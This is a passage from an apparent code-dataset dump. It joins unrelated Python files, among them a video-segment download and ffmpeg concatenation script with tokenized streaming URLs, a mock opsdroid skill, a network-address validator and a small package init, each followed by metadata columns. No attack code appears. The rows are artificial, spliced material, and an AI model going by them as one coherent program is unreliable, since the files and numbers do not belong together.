dCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/70B22A56A9D502EAA9A6B0903725B265_1470080_1480080_1524_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/C58869235AC160B79FC4381CCBA62CFA_1480080_1490080_719_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/CFACD371A48385CFD58087F85C034496_1490080_1500080_444_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/B2274FFC3028B31949249D382B2EB75C_1500080_1507520_420_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3"]
# print(len(js_list))
# num=0
# for aim_url in js_list:
# aim_response = requests.get(aim_url)
# f = open(os.path.join(os.path.dirname(__file__), 'D:/github/1/hotpoor_autoclick_xhs/videos/%s.%s' % (num, "mp4")), "ab")
# f.write(aim_response.content) # 多媒体存储content
# f.close()
# num += 1
# ffmpeg -i "concat:0.mp4|1.mp4|2.mp4|3.mp4|4.mp4|5.mp4|6.mp4|7.mp4|8.mp4|9.mp4|10.mp4|11.mp4|12.mp4|13.mp4|14.mp4|15.mp4|16.mp4|17.mp4|18.mp4|19.mp4|20.mp4|21.mp4|22.mp4|23.mp4|24.mp4|25.mp4|26.mp4|27.mp4|28.mp4|29.mp4|30.mp4|31.mp4|32.mp4|33.mp4|34.mp4|35.mp4|36.mp4|37.mp4|38.mp4|39.mp4|40.mp4|41.mp4|42.mp4|43.mp4|44.mp4|45.mp4|46.mp4|47.mp4|48.mp4|49.mp4|50.mp4|51.mp4|52.mp4|53.mp4|54.mp4|55.mp4|56.mp4|57.mp4|58.mp4|59.mp4|60.mp4|61.mp4|62.mp4|63.mp4|64.mp4|65.mp4|66.mp4|67.mp4|68.mp4|69.mp4|70.mp4|71.mp4|72.mp4|73.mp4|74.mp4|75.mp4|76.mp4|77.mp4|78.mp4|79.mp4|80.mp4|81.mp4|82.mp4|83.mp4|84.mp4|85.mp4|86.mp4|87.mp4|88.mp4|89.mp4|90.mp4|91.mp4|92.mp4|93.mp4|94.mp4|95.mp4|96.mp4|97.mp4|98.mp4|99.mp4|100.mp4|101.mp4|102.mp4|103.mp4|104.mp4|105.mp4|106.mp4|107.mp4|108.mp4|109.mp4|110.mp4|111.mp4|112.mp4|113.mp4|114.mp4|115.mp4|116.mp4|117.mp4|118.mp4|119.mp4|120.mp4|121.mp4|122.mp4|123.mp4|124.mp4|125.mp4|126.mp4|127.mp4|128.mp4|129.mp4|130.mp4|131.mp4|132.mp4|133.mp4|134.mp4|135.mp4|136.mp4|137.mp4|138.mp4|139.mp4|140.mp4|141.mp4|142.mp4|143.mp4|144.mp4|145.mp4|146.mp4|147.mp4|148.mp4|149.mp4|150.mp4|151.mp4" -acodec copy -vcodec copy -absf aac_adtstoasc out.mp4
#ffmpeg -i "concat:f00282urkwd.321002.1.ts|f00282urkwd.321002.2.ts|f00282urkwd.321002.3.ts|f00282urkwd.321002.4.ts|f00282urkwd.321002.5.ts|f00282urkwd.321002.6.ts|f00282urkwd.321002.7.ts|f00282urkwd.321002.8.ts|f00282urkwd.321002.9.ts|f00282urkwd.321002.10.ts|f00282urkwd.321002.11.ts|f00282urkwd.321002.12.ts|f00282urkwd.321002.13.ts|f00282urkwd.321002.14.ts|f00282urkwd.321002.15.ts|f00282urkwd.321002.16.ts|f00282urkwd.321002.17.ts|" -c copy output.mp4
print(os.listdir('D:/github/1/hotpoor_autoclick_xhs/videos')) | 8,303.933333 | 122,524 | 0.937114 | 9,272 | 124,559 | 12.308671 | 0.075065 | 0.017314 | 0.023974 | 0.029301 | 0.923909 | 0.923909 | 0.923909 | 0.92333 | 0.92333 | 0.92333 | 0 | 0.224464 | 0.00061 | 124,559 | 15 | 122,525 | 8,303.933333 | 0.692336 | 0.015447 | 0 | 0 | 0 | 38 | 0.995719 | 0.000326 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0.25 | 0 | 0 | 1 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 13 |
b0e39d8c566de915360043c5729752c854232ad8 | 118 | py | Python | opsdroid/testing/mockmodules/skills/temp_skill.py | JiahnChoi/opsdroid.kr | 0893456b0f9f6c70edf7c330a7593d87450538cc | [
"Apache-2.0"
] | 712 | 2016-08-09T21:30:07.000Z | 2022-03-24T09:38:21.000Z | opsdroid/testing/mockmodules/skills/temp_skill.py | JiahnChoi/opsdroid.kr | 0893456b0f9f6c70edf7c330a7593d87450538cc | [
"Apache-2.0"
] | 1,767 | 2016-07-27T13:01:25.000Z | 2022-03-29T04:25:10.000Z | opsdroid/testing/mockmodules/skills/temp_skill.py | JiahnChoi/opsdroid.kr | 0893456b0f9f6c70edf7c330a7593d87450538cc | [
"Apache-2.0"
] | 536 | 2016-07-31T14:23:41.000Z | 2022-03-22T17:35:15.000Z | """A mocked skill."""
from opsdroid.skill import Skill
class TestSkill(Skill):
"""A mocked skill."""
pass
| 11.8 | 32 | 0.635593 | 15 | 118 | 5 | 0.6 | 0.186667 | 0.32 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.211864 | 118 | 9 | 33 | 13.111111 | 0.806452 | 0.262712 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
b048ecbdd5e0d56a57a66a258969856a5d344cc2 | 2,886 | py | Python | xpathwebdriver/validators.py | nicolasmendoza/xpathwebdriver | c0d0e1f9fc013a1aa99f6061afd21f3c167558aa | [
"MIT"
] | 2 | 2019-04-18T10:24:00.000Z | 2021-02-27T16:41:24.000Z | xpathwebdriver/validators.py | nicolasmendoza/xpathwebdriver | c0d0e1f9fc013a1aa99f6061afd21f3c167558aa | [
"MIT"
] | null | null | null | xpathwebdriver/validators.py | nicolasmendoza/xpathwebdriver | c0d0e1f9fc013a1aa99f6061afd21f3c167558aa | [
"MIT"
] | 1 | 2017-04-18T05:46:00.000Z | 2017-04-18T05:46:00.000Z | # -*- coding: utf-8 -*-
'''
'''
import re
localhost = re.compile('localhost')
pattern = re.compile(
r'^(([a-zA-Z]{1})|([a-zA-Z]{1}[a-zA-Z]{1})|'
r'([a-zA-Z]{1}[0-9]{1})|([0-9]{1}[a-zA-Z]{1})|'
r'([a-zA-Z0-9][-_.a-zA-Z0-9]{0,61}[a-zA-Z0-9]))\.'
r'([a-zA-Z]{2,13}|[a-zA-Z0-9-]{2,30}.[a-zA-Z]{2,3})$'
)
ip_pattern = re.compile(
r'^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}'
'([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$'
)
#from https://gist.github.com/mnordhoff/2213179
ip6_pattern = re.compile('^(?:(?:[0-9A-Fa-f]{1,4}:){6}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|::(?:[0-9A-Fa-f]{1,4}:){5}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:){4}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:){3}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,2}[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:){2}(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,3}[0-9A-Fa-f]{1,4})?::[0-9A-Fa-f]{1,4}:(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,4}[0-9A-Fa-f]{1,4})?::(?:[0-9A-Fa-f]{1,4}:[0-9A-Fa-f]{1,4}|(?:(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5]))|(?:(?:[0-9A-Fa-f]{1,4}:){,5}[0-9A-Fa-f]{1,4})?::[0-9A-Fa-f]{1,4}|(?:(?:[0-9A-Fa-f]{1,4}:){,6}[0-9A-Fa-f]{1,4})?::)$')
def is_valid_netloc(value):
'''
Return whether or not given value is a valid domain or ip address.
'''
if ']:' in value:
value = value.split('[')[1].split(']:')[0]
elif value.count(':') == 1:
value = value.split(':')[0]
return (pattern.match(value)
or ip_pattern.match(value)
or ip6_pattern.match(value)
or localhost.match(value))
def smoke_test_module():
import rel_imp; rel_imp.init()
from .logger import log_test
log_test(is_valid_netloc('ble'))
log_test(is_valid_netloc('google.com'))
log_test(is_valid_netloc('10.0.1.1:8080'))
log_test(is_valid_netloc('2001:db8:85a3:8d3:1319:8a2e:370:7348'))
log_test(is_valid_netloc('[2001:db8:85a3:8d3:1319:8a2e:370:7348]:8000'))
if __name__ == "__main__":
smoke_test_module()
| 57.72 | 1,536 | 0.46431 | 722 | 2,886 | 1.804709 | 0.108033 | 0.101305 | 0.078281 | 0.156562 | 0.605526 | 0.553338 | 0.553338 | 0.553338 | 0.531082 | 0.531082 | 0 | 0.211459 | 0.080735 | 2,886 | 49 | 1,537 | 58.897959 | 0.279683 | 0.046778 | 0 | 0 | 0 | 0.21875 | 0.705537 | 0.687202 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.09375 | 0 | 0.1875 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c68c4da2f74f4bfed0d132ea47251ce1d0c15706 | 147 | py | Python | normalization/__init__.py | DanielMorales9/LinearRegression | 7c905e5317a2eb4cc3b2cab275bbcec8e9db57f9 | [
"MIT"
] | null | null | null | normalization/__init__.py | DanielMorales9/LinearRegression | 7c905e5317a2eb4cc3b2cab275bbcec8e9db57f9 | [
"MIT"
] | null | null | null | normalization/__init__.py | DanielMorales9/LinearRegression | 7c905e5317a2eb4cc3b2cab275bbcec8e9db57f9 | [
"MIT"
] | null | null | null | from .normalization import MeanNormalization
from .normalization import ZScoreNormalization
__all__ = ["MeanNormalization", "ZScoreNormalization"] | 36.75 | 54 | 0.85034 | 11 | 147 | 11 | 0.545455 | 0.280992 | 0.380165 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081633 | 147 | 4 | 54 | 36.75 | 0.896296 | 0 | 0 | 0 | 0 | 0 | 0.243243 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 1 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.